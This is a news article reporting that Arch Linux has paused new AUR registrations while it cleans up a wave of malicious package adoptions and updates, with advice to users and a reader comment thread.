Arch Linux Blocks New AUR Registrations Amid Malware Cleanup

Arch Linux’s AUR is still operational, while new account registration appears blocked during ongoing cleanup work.

Arch Linux is dealing with one of the largest security incidents to hit the Arch User Repository in recent memory, as maintainers continue cleaning up a wave of malicious package updates across the community-maintained platform.

Importantly, the AUR remains online, and packages are accessible. However, new account registration is unavailable, with the registration page returning a 503 Service Unavailable error. While not officially announced, this suggests Arch has temporarily blocked an entry point as it works through the cleanup.

The move follows an official Arch Linux warning notice dated June 12 about a “high volume” of malicious package adoptions and updates in the AUR. Maintainers are tracking down malicious commits and trying to prevent more from being pushed while preparing a permanent solution.

Arch also warned users may experience problems with new account creation, package updates, adoptions, and new package creation during the response.

Unfortunately, the incident appears far larger than early reports suggested. Initial public reports pointed to over 400 affected AUR packages, while later community tracking raised the number to more than 1,500. The final count may still change as maintainers continue auditing and removing malicious changes.

The scale of the AUR helps explain why the incident is difficult to contain quickly. According to the repository’s own statistics, the AUR currently lists 107,405 packages, including 13,051 orphan packages. It also shows 273 packages added in the past seven days and 5,575 packages updated over the same period, alongside 141,968 registered users.

The campaign reportedly abused the AUR’s package adoption system, where orphaned packages can be taken over by new maintainers. Malicious updates were pushed to affected packages, sometimes pulling external payloads during build or installation.

For users, the immediate advice remains: review PKGBUILD files and install scripts before installing or updating AUR packages, especially if a package recently changed maintainer or received an unexpected update. Users who installed recently updated packages should check the package history and inspect commands executed during build or install.

Expectably, this incident will likely renew discussion around AUR safeguards. Possible areas include tougher rules for adopting orphan packages, delays before new accounts can submit or adopt packages, and stronger review of sudden ownership changes.

For now, Arch Linux is keeping the AUR operational while blocking or limiting actions that could let the campaign continue. New registrations being unavailable is the clearest sign the project is taking containment measures while maintainers clean up malicious packages.

Bobby Borisov

Bobby Borisov

Bobby, an editor-in-chief at Linuxiac, is a Linux professional with over 20 years of experience. With a strong focus on Linux and open-source software, he has worked as a Senior Linux System Administrator, Software Developer, and DevOps Engineer for small and large multinational companies.

11 Comments

  1. Alex

    Normally only unneeded rare packages contain malware. Just dont use them.

  2. Alex

    There is also https://appimage.github.io/apps/ if you wish. Flatpack. But then use other distribution.

  3. Alex

    Even presidents get donations from doubtful sources. If democracy someone can vote for bad people.

    1. Alex

      But the advantages prevail.

  4. Josef

    I like using the AUR repository. These attacks don’t bother me. Anyone who installs packages from the AUR should verify what they’re actually installing and how secure it is.

  5. yoyo

    Well I loved a lot arch based distros.
    I said goodbye.
    Tired of attacks on Aur.
    Now I use Void, Mx Linux & Fedora.

    I bet all these attacks are aimed to ‘lower’ linux distros reputation/security.

    This is not coincidence.

    Many are leaving Windows…

    Even Windows created is linux distro, ROFL…

    ;=

    1. VoltaFlake

      Reactionary much?
      Void and MX are good alternatives either way.
      I also suspect these attacks are astroturfing, but by Red Hat (the Microsoft of Linux) to push their own solution. Wouldn’t be the first time they do some crappy stuff to discredit the competition and push their own agenda.

  6. Waten

    I would never use this for software

    1. AlexLitter

      Why is that?
      The AUR is a fantastic resource if you use it with all the caution required.
      I have several packages installed, and no issues (even with these attacks).

      1. Rick

        whats the point of using when you can find almost anything from safer vetted sources.

        1. Alex

          Those sources dont like competition, I guess.

Leave a Reply

Your email address will not be published. Required fields are marked *